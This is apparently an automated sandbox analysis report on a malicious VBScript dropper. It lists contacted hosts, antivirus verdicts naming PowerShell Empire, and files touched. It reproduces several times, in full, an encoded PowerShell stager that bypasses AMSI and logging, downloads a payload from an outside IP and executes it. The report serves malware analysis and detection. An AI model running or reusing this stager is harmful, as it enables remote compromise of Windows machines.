ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA= |
host | 117.18.232.200 | |||
host | 89.197.154.116 |
parent_process | wscript.exe | martian_process | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA= | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA= |
option | -nop | value | Does not load current user profile | ||||||
option | -nop | value | Does not load current user profile |
Cynet | Malicious (score: 99) |
CAT-QuickHeal | Script.Trojan.39876 |
Skyhigh | PS/Dropper.f |
ALYac | GT:VB.ObfDldr.28.29C080A2 |
VIPRE | GT:VB.ObfDldr.28.29C080A2 |
Sangfor | Malware.Generic-VBS.Save.f99adb70 |
Arcabit | GT:VB.ObfDldr.28.29C080A2 |
Symantec | Trojan.Malscript!gen8 |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.ABM |
McAfee | PS/Dropper.f |
Avast | VBS:Downloader-AXD [Trj] |
Kaspersky | HEUR:Trojan.PowerShell.Generic |
BitDefender | GT:VB.ObfDldr.28.29C080A2 |
NANO-Antivirus | Trojan.Script.Downloader.inbiqr |
MicroWorld-eScan | GT:VB.ObfDldr.28.29C080A2 |
Emsisoft | GT:VB.ObfDldr.28.29C080A2 (B) |
F-Secure | Malware.VBS/PSRunner.VPSV |
FireEye | GT:VB.ObfDldr.28.29C080A2 |
Sophos | ATK/Empire-U |
Ikarus | Trojan-Downloader.PowerShell.Agent |
Detected | |
Avira | VBS/PSRunner.VPSV |
MAX | malware (ai score=83) |
Xcitium | TrojWare.Win32.BadShell.XSN@7pmib7 |
Microsoft | VirTool:PowerShell/Empire.gen!A |
ZoneAlarm | HEUR:Trojan.PowerShell.Generic |
GData | GT:VB.ObfDldr.28.29C080A2 |
AhnLab-V3 | Powershell/Downloader.S5 |
Tencent | Heur:Trojan.Powershell.Generic.u |
huorong | TrojanDownloader/PS.MalDownload.g |
Fortinet | PowerShell/Agent.AN!tr |
AVG | VBS:Downloader-AXD [Trj] |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
dead_host | 192.168.56.101:49165 |
dead_host | 192.168.56.101:49164 |
dead_host | 89.197.154.116:7810 |
dead_host | 192.168.56.101:49163 |